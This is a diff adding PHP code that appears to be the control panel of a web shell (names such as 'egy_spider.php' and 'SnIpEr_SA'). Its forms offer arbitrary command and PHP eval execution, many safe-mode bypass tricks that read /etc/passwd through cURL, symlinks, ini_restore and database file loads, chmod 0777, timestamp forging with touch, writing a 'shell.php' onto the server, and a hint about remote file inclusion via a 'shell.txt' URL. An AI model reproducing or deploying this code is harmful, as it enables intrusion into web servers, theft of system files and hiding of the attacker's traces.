+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id20').$table_up2.div('id20').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+if($unix && @function_exists('touch')){
+echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"])))
+.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
+.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
+echo sr(15,"<b> or set Day".$arrow."</b>",
+'
+<select name="day" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+</select>'
+.ws(4)."<b>Month".$arrow."</b>"
+.'
+<select name="month" size="1">
+<option value="January">January</option>
+<option value="February">February</option>
+<option value="March">March</option>
+<option value="April">April</option>
+<option value="May">May</option>
+<option value="June">June</option>
+<option value="July">July</option>
+<option value="August">August</option>
+<option value="September">September</option>
+<option value="October">October</option>
+<option value="November">November</option>
+<option value="December">December</option>
+</select>'
+.ws(4)."<b>Year".$arrow."</b>"
+.'
+<select name="year" size="1">
+<option value="1998">1998</option>
+<option value="1999">1999</option>
+<option value="2000">2000</option>
+<option value="2001">2001</option>
+<option value="2002">2002</option>
+<option value="2003">2003</option>
+<option value="2004">2004</option>
+<option value="2005">2005</option>
+<option value="2006">2006</option>
+<option value="2006">2007</option>
+<option value="2006">2008</option>
+<option value="2006">2009</option>
+<option value="2006">2010</option>
+</select>'
+.ws(4)."<b>Hour".$arrow."</b>"
+.'
+<select name="chasi" size="1">
+<option value="01">01</option>
+<option value="02">02</option>
+<option value="03">03</option>
+<option value="04">04</option>
+<option value="05">05</option>
+<option value="06">06</option>
+<option value="07">07</option>
+<option value="08">08</option>
+<option value="09">09</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+</select>'
+.ws(4)."<b>Minute".$arrow."</b>"
+.'
+<select name="minutes" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.ws(4)."<b>Second".$arrow."</b>"
+.'
+<select name="second" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.in('hidden','cmd',0,'touch')
+.in('hidden','dir',0,$dir)
+.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+$select='';
+if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
+if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
+if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
+if($unix && $select){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
+echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id5555').$table_up2.div('id5555').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id50').$table_up2.div('id50').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id800').$table_up2.$font;
+echo "<div align=center>".div('id800')."<textarea name=php_eval cols=100 rows=10>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"egy_spider.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id520').$table_up2.div('id520').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id500').$table_up2.div('id500').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id510').$table_up2.div('id510').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id800').$table_up2.div('id800').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id900').$table_up2.div('id900').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id980').$table_up2.div('id980').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Paralyzing been planted and you can usefilename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id801').$table_up2.div('id801').$ts;
+echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id5505').$table_up2.div('id5505').$ts;
+echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text151'],'id1221').$table_up2.div('id1221').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test_5_2_6',85,(!empty($_POST['test_5_2_6'])?($_POST['test_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text161'],'id12211').$table_up2.div('id12211').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_5_2_6',85,(!empty($_POST['test2_5_2_6'])?($_POST['test2_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+
+
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text162'],'id9820').$table_up2.div('id9820').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text163'],'id9820').$table_up2.div('id9820').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_perl').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text170'],'id2221').$table_up2.div('id2221').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','egy_4_2_0',96,(!empty($_POST['egy_4_2_0'])?($_POST['egy_4_2_0']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_4_2_0').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
+"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
+"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
+echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up3.div('id27').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
